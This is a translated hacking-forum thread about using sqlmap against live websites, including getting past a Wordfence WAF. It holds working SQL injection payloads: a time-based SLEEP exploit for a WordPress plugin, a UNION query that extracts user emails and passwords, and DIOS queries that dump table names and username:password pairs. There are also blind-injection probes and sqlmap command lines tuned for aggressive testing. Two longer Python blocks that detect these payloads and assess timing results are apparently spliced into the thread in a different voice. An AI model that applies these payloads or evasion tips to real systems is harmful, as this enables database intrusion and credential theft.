Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. BabaDook (Well-Known Member)

    That can't be. Try putting a * in.
     
  2. Andrey979 (New Member)

    Guys, which tamper can get past the Wordfence WAF? The site, as I figured out, is on WordPress. I found a vulnerable plugin. There is an SQLi in the POST request on the login page. There is a ready-made exploit: http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)
    But the browser shows
    403 Forbidden
    A potentially unsafe operation has been detected in your request to this site
    How do I get past this WAF with sqlmap?

    I'm trying verbose -v3. 403 error everywhere. How do I feed this exploit to sqlmap?
     
    #1002 Andrey979, 7 Feb 2020
    Last edited: 7 Feb 2020
  3. BabaDook (Well-Known Member)

    You're asking about one thing, but the logs (what you pasted) show something else entirely. As for tampers, it's hard to say; you have to test by hand. Better to work it manually.
     
  4. Andrey979 (New Member)

    I don't have the SQL knowledge to work it by hand. With sqlmap it's a bit easier, but I don't fully know how to work with it either. A decent manual in Russian on working it by hand would be nice.
     
  5. BabaDook (Well-Known Member)

    Chrome has a translator, and there is also the forum search.
     
    Andrey979 likes this.
  6. Xsite (Member)

    Can someone help convert this into DIOS form?

    5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,
    ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uBIi

    Although it's a union here, it still outputs 1 record, and very slowly.
     
  7. BabaDook (Well-Known Member)

    "Can someone help convert this into DIOS form?" - What do you mean?
     
  8. Xsite (Member)

    Something like this

    https://defcon.ru/web-security/2320/

    so that it doesn't "spit out" one record at a time
     
  9. BabaDook (Well-Known Member)

    Well, google dios mssql.
    P.S. Maybe remove the limit?
     
  10. Xsite (Member)

    It's mysql.
    P.S. Why remove the limit, when https://rdot.org/forum/showthread.php?t=124&page=2

    SELECT @p FROM (SELECT @p:=null,(SELECT COUNT(*) FROM (SELECT * FROM {TABLE_NAME} LIMIT {S},{N})r WHERE (@p:=concat_ws(0x2c,@p,{COLUMN_NAME}))>0))o
     
  11. BabaDook (Well-Known Member)

    And how does this relate to sqlmap?
     
  12. karkajoi (Active Member)

    Code:
    (select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)  - tables
    (select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name={NAME_TABLE_HEX}) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x) - columns
    (select (@x) from (select (@x:=0x00),(select (0) from ({TABLE_NAME})where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password))))x) - data

    And yes, the post is in the wrong thread.
     
    #1012 karkajoi, 10 Feb 2020
    Last edited: 10 Feb 2020
    Xsite likes this.
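The payload shapes quoted in this thread (the SLEEP() probe in post 2, the long UNION ALL SELECT in post 6, and the @var:=concat() row-collapsing queries in posts 10 and 12) are exactly what a request filter such as the Wordfence rule that returned 403 above keys on. The following is an added example, written for this page and not taken from any poster or from Wordfence: a small signature matcher that a defender can run over request logs to flag these shapes. The sample requests, paths and parameter names are constructed for the example; only the injection syntax follows the thread. It also normalises `/**/` comments before matching, so the `space2comment` rewriting that sqlmap's own log output mentions later in the thread does not hide a payload from the same rules.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests as (method, path, body). The payload shapes follow
# the strings quoted in this thread; hosts, paths and parameter names are made up.
SAMPLE_REQUESTS = [
    ("GET", "/wp-admin/admin.php?page=unitegallery&view=preview&id=1", ""),
    ("GET", "/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)", ""),
    ("POST", "/wp-login.php", "log=0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z&pwd=x"),
    ("GET", "/item.php?id=5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20)) FROM base.users LIMIT 3,1),NULL-- uBIi", ""),
    ("GET", "/item.php?id=(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)", ""),
    ("POST", "/search.php", "q=sleeping+bags+union+jack"),  # benign, must not match
]

# Each rule names one payload shape seen in the thread.
SIGNATURES = {
    "time_based_sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "user_var_concat": re.compile(r"@\w+\s*:=\s*concat(?:_ws)?\s*\(", re.I),
    "schema_probe": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
    # long hex literals are how DIOS-style queries smuggle delimiters (0x3c62723e = "<br>")
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
}


def normalise(raw: str) -> str:
    """URL-decode, drop MySQL inline comments and collapse whitespace, so a
    payload rewritten as UNION/**/SELECT matches the same rule as UNION SELECT."""
    text = unquote_plus(raw)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)


def classify(method: str, path: str, body: str) -> list:
    """Return the sorted names of every signature that matches the request.
    Query string and body are checked together: the thread's injections sit in both."""
    text = normalise(path + " " + body)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan(requests) -> list:
    """Return only the flagged requests as (method, path, matched signature names)."""
    flagged = []
    for method, path, body in requests:
        hits = classify(method, path, body)
        if hits:
            flagged.append((method, path, hits))
    return flagged


if __name__ == "__main__":
    for method, path, hits in scan(SAMPLE_REQUESTS):
        print(f"{method} {path[:60]:<60} {', '.join(hits)}")
```

A single `hex_literal` hit on its own is weak evidence (legitimate applications do pass hex tokens); treat it as a booster for the other rules rather than a verdict. The rules are deliberately simple pattern matches, the same class of check that produced the 403 in post 2, and like any such filter they describe known shapes, not the injection itself: the fix on the application side is still parameterised queries in the plugin.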
  13. karkajoi (Active Member)

    Can you see the size of the DB, tables and columns with sqlmap?
     
    #1013 karkajoi, 15 Feb 2020
    Last edited: 15 Feb 2020
  14. o314um (Member)

    --count
     
  15. yuriy_ivanov (New Member)

    Just use -D ... --columns --count right away.
     
  16. karkajoi (Active Member)

    I meant not the number of records in a given table, but their size in B, MB.
     
  17. NineCent (New Member)

    Can anyone help? Acunetix found a blind SQLi.
    • 0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z => 3.333
    • 0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z => 9.471
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.449
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.776
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.608
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.581
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.463
    • 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z => 6.504
    • 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z => 0.7
    I start running sqlmap and type the following:

    (here: the file with cookies and the rest) -p "service" --dbs --threads 10 --time-sec 10 --risk=3 --level=5

    It tells me the parameter is vulnerable.

    [16:58:49] [INFO] POST parameter 'service' appears to be 'HSQLDB >= 2.0 stacked queries (heavy query)' injectable
    it looks like the back-end DBMS is 'HSQLDB'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
    But then it finds nothing.

    Every time I run it again it gives a result, but a different variant of the vulnerable version each time =\
    What could I try? Please advise.
     
  18. BabaDook (Well-Known Member)

    (here: the file with cookies and the rest) -p "service" --dbs --time-sec 5 --risk=3 --level=5
    Try it like this, or install an old version of sqlmap.
     
  19. NineCent (New Member)

    Tried it, the result is better, but now the server drops the connection. What can I do next?

    [17:33:11] [INFO] POST parameter 'service' appears to be 'IBM DB2 stacked queries (heavy query - comment)' injectable
    it looks like the back-end DBMS is 'IBM DB2'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
    [17:34:27] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
    [17:34:27] [INFO] checking if the injection point on POST parameter 'service' is a false positive
    [17:34:27] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
    [17:34:27] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
    [17:34:27] [WARNING] false positive or unexploitable injection point detected
    [17:34:27] [WARNING] POST parameter 'service' does not seem to be injectable
    [17:34:27] [CRITICAL] all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
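The two posts above show the same time-based finding first reported as HSQLDB, then as IBM DB2, then rejected as a false positive with the warning that the server "hasn't recovered yet from previous timed based payload". Whether a delay measurement is real or just a slow server is a question of baseline and jitter, and it can be decided from the nine Acunetix measurements quoted in post 17. The block below is an added example, written for this page and not part of the thread or of sqlmap: it takes (requested sleep, observed time) pairs, uses the median of the sleep(0) controls as the baseline, checks each delayed probe against baseline plus requested delay, and refuses to conclude anything when the controls themselves wobble more than the tolerance. The first series is the thread's own numbers; the second is a constructed series illustrating the overloaded-server case the sqlmap warning describes.

```python
from statistics import median

# From the Acunetix measurements quoted in post 17:
# (requested sleep in seconds, observed response time in seconds).
OBSERVATIONS = [
    (3, 3.333), (9, 9.471), (0, 0.449), (6, 6.776), (0, 0.608),
    (0, 0.581), (0, 0.463), (6, 6.504), (0, 0.7),
]

# Constructed for contrast: the same probes against a server still busy
# finishing earlier sleep() requests, so even sleep(0) controls are slow.
UNSTABLE_SERVER = [
    (3, 3.4), (0, 5.2), (0, 0.5), (6, 12.1), (0, 4.8), (9, 9.6),
]


def assess(observations, tolerance=1.0) -> dict:
    """Decide whether observed response times track the requested delay.

    baseline  = median response time of the sleep(0) controls
    jitter    = spread (max - min) of those controls
    a probe is consistent when |observed - (baseline + delay)| <= tolerance
    verdict   = 'inconclusive' if the controls jitter more than the tolerance
                (no probe can be trusted against a baseline that unstable),
                'consistent' if every delayed probe lands where expected,
                'inconsistent' otherwise.
    """
    controls = [t for delay, t in observations if delay == 0]
    probes = [(delay, t) for delay, t in observations if delay > 0]
    if not controls or not probes:
        raise ValueError("need at least one sleep(0) control and one delayed probe")

    baseline = median(controls)
    jitter = max(controls) - min(controls)
    consistent = sum(
        1 for delay, t in probes if abs(t - (baseline + delay)) <= tolerance
    )

    if jitter > tolerance:
        verdict = "inconclusive"
    elif consistent == len(probes):
        verdict = "consistent"
    else:
        verdict = "inconsistent"

    return {
        "baseline": round(baseline, 3),
        "jitter": round(jitter, 3),
        "consistent": consistent,
        "probes": len(probes),
        "verdict": verdict,
    }


if __name__ == "__main__":
    for label, series in (("acunetix", OBSERVATIONS), ("unstable", UNSTABLE_SERVER)):
        r = assess(series)
        print(f"{label}: baseline {r['baseline']}s, jitter {r['jitter']}s, "
              f"{r['consistent']}/{r['probes']} probes consistent -> {r['verdict']}")
```

On the thread's numbers the baseline is 0.581 s with a quarter-second of jitter and all four delayed probes land within 0.25 s of baseline plus delay, which is a clean time-based signal. On the constructed series the controls alone spread by 4.7 s, so the function reports "inconclusive" rather than guessing. That is the state the sqlmap log above describes: once the server is backed up with outstanding sleep() calls, every DBMS-specific "heavy query" payload appears to delay the response, which is why successive runs attribute the same parameter to different database engines and why the log's own advice (wait, lower `--time-sec`, or drop the T technique for that run) is about restoring a stable baseline before believing any delay.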
     
  20. hashfinderboss (New Member)

    In sqlmap --current-db is supposedly the current database, but what does "current" mean? The DB of the domain where the SQLi is, or what?
     